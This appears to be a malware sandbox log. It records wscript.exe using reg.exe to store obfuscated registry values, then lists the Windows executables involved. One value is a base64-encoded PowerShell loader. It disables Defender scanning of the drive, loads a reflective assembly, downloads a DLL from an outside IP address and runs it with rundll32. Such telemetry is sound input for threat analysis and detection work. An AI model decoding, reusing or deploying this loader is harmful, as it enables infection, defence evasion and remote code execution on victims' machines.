parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= | ||||||
parent_process | wscript.exe | martian_process | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW |
file | C:\Windows\System32\reg.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\rundll32.exe |